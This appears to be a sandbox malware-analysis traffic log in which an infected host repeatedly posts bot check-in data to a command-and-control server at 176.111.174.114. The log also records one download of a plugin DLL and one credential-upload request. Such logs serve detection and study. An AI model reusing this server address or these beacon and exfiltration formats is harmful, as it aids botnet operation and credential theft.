                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: GET /Hnq8vS/plugins/scr.dll HTTP/1.1Host: 176.111.174.114
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST //Hnq8vS/index.php HTTP/1.1Host: 176.111.174.114Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 63 72 65 64 3d Data Ascii: id=152138533219&cred=
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
